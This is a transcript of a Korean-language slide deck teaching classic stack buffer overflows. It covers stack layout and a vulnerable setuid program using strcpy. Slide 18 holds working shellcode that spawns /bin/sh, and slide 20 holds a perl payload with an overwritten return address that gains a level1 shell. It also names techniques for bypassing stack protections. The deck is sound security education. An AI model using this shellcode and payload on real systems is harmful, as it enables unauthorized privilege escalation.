1 / 22

Basic of Buffer Over Flow

Basic of Buffer Over Flow. S.S.G 방승원. Agenda. Introduction Memory Structure Stack Structure while Example Target Program Ready & Attack Attack & Security Application of Overflow. Introduction. Overflow ?? 넘치다 , 넘쳐 흐르다 ; 범람하다 ; < 용기 등이 > 가득 차다 , 넘치다 Buffer Over Flow ??

korene
Download Presentation

Basic of Buffer Over Flow

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Basic of Buffer Over Flow S.S.G 방승원

  2. Agenda • Introduction • Memory Structure • Stack Structure while Example • Target Program • Ready & Attack • Attack & Security • Application of Overflow

  3. Introduction • Overflow ?? • 넘치다, 넘쳐 흐르다;범람하다; • <용기 등이> 가득 차다, 넘치다 • Buffer Over Flow ?? • 정해진 메모리보다 많은 데이터를 입력 받아 특정 영역을 덮음으로써 프로그램 흐름을 바꿔 공격자가 원하는 코드를 실행하는 공격 • <Phrack Magazine 49-14>, Aleph One

  4. Memory Structure LOW TEXT • TEXT : Program Code • DATA : Static Variable Global Variable • HEAP : Dynamic Allocation • STACK Dynamic Varbiable Local Variable DATA HEAP STACK HIGH

  5. Stack Structure Memory LOW (0x08048000) Stack HIGH STACK • LIFO(Last In First Out) • PUSH • POP • SP(Stack Pointer) • BP(Base Pointer) PUSH POP C B SP Stack LOW Memory HIGH (0xbfffffff) A BP

  6. Example Program #include <stdio.h> void func(int a, int b, int c) { int buf1; char buf2[16]; } void main() { func(1, 2, 3); printf(“Hello, World!\n”); }

  7. Example Program Memory LOW (0x08048000) Stack HIGH STACK #include <stdio.h> void func(int a, int b, int c) { int buf1; char buf2[16]; } void main() { func(1, 2, 3); printf(“Hello, World!\n”); } buf2 buf1 Stack Frame Pointer Return Address 1 2 ESP Stack LOW Memory HIGH (0xbfffffff) 3 EBP

  8. Example Program Memory LOW (0x08048000) Stack HIGH STACK main: pushl $3 pushl $2 pushl $1 call func addl $16, %esp func: pushl %ebp movl %esp, %ebp subl $40, %esp leave (pop %ebp ret buf2 buf1 Dummy Stack Frame Pointer Return Address 1 2 ESP Stack LOW Memory HIGH (0xbfffffff) 3 EBP

  9. Target Program #include <stdio.h> #include <string.h> void func(char *str) { char buf[64]; strcpy(buf, str); } void main(int argc, char *argv[]) { func(argv[1]); printf(“Hello, World\n”); } • argc, argv • 프로그램을 실행 할 때 인자를 입력받는 방법 • ex) ./target bang 1234 • argv = 3; • argv[0] = “target”; • argv[1] = “bang”; • argv[2] = “1234”; • strcpy(dest, src) • src가 가르키는 문자열을 dest로 복사 • * 크기 제한이 없어 • overflow취약점 발생

  10. Target Program • Setuid Bit 가 걸려있음 Set User ID Bit(number – 4000) $ chmod 4755 target (or chmod u+s) -rwsr-xr-x 1 level1 level1 target  어떤 사용자든지 이 target을 실행할 땐 level1 유저권한을 갖게 됨 ex) passwd • Redhat 9.0, Kernel 2.4.32, gcc 3.2.2-5

  11. Target Program • Let’s Run program With a lot of ‘A’ Character!!! • Result : Segmentation Fault • Why??

  12. Target Program Memory LOW (0x08048000) Stack HIGH STACK #include <stdio.h> #include <string.h> void func(char *str) { char buf[64]; strcpy(buf, str); } void main(int argc, char *argv[]) { func(argv[1]); printf(“Hello, World\n”); } buf Dummy SFP RET ESP Stack LOW Memory HIGH (0xbfffffff) str = argv[1] EBP

  13. Target Program Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x71'` 64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ] Stack LOW Stack HIGH Normal

  14. Target Program Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x72'` 64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ] Stack LOW Stack HIGH Overflow

  15. Target Program Memory HIGH Memory LOW $ ./target `perl -e 'print "A"x80'` 64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes STACK buf Dummy SFP RET str = argv[1] [ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ AAAA ][ AAAA ][ BBFFFFBB ] Stack LOW Stack HIGH Real Overflow

  16. Target Program Memory LOW (0x08048000) Stack HIGH STACK func: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave ret main: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func addl $16, %esp subl $12, %esp A A A A A A A A A Dummy SFP [ BFFFFFBF ] RET [ BBFFFF08 ] E SP Stack LOW Memory HIGH (0xbfffffff) str E BP

  17. Target Program Memory LOW (0x08048000) Stack HIGH STACK func: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave ret main: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func addl $16, %esp subl $12, %esp A A A A A A A A A 0x41414141(??) Dummy [ AAAA ] SFP [ AAAA ] RET [ AAAA ] E SP Stack LOW Memory HIGH (0xbfffffff) str E BP

  18. Shell Code • 쉘을 실행해주는 코드 #include <unistd.h> void main() { char *shell[2]; setreuid(3001, 3001); shell[0] = "/bin/sh"; shell[1] = NULL; execve(shell[0], shell, NULL); } 어셈코드 "\x31\xc0\x31\xdb\x31\xc9\x66\xbb” “\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46” “\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88” ”\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3” ”\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31” ”\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  19. Attack Ready • Segmentation Fault 확인 • 쉘코드 제작 • 쉘코드를 버퍼에다 넣었을 때, 그 버퍼의 주소를 찾아야 됨 • But, 버퍼의 주소를 추측하기가 어려움 • 그러므로 쉘 환경 변수에 쉘코드를 넣어서 사용하여 쉘코드의 주소를 계산해 주는 Eggshell 사용

  20. Attack bash-2.05b$ ./egg 512 200 Using address: 0xbffffa60 bash-2.05b$ ./target `perl -e 'print "A"x76';(printf "\x60\xfa\xff\xbf")` sh-2.05b$ id uid=3001(level1) gid=1000(guest) groups=1000(guest) sh-2.05b$

  21. Attack V.S Security • Non-executable Stack  Return Into Libc  Omega Project • Stack Guard and Stack Shield  Bypass Stack Guard and Stack Shield • Random Stacks • Exec Shield(커널수준)  Exec Shield 회피 • strcpy(), strcat(), gets(), fscanf(), scanf(), sprintf() 등 사용 자제 -> strncpy() strncat() 사용 • And so on………

  22. Application of Overflow • Windows, Unix, Linux, Mac • Local, Remote • Web -> ActiveX • Heap Overflow • Integer Overflow • Frame Pointer Overwrite

More Related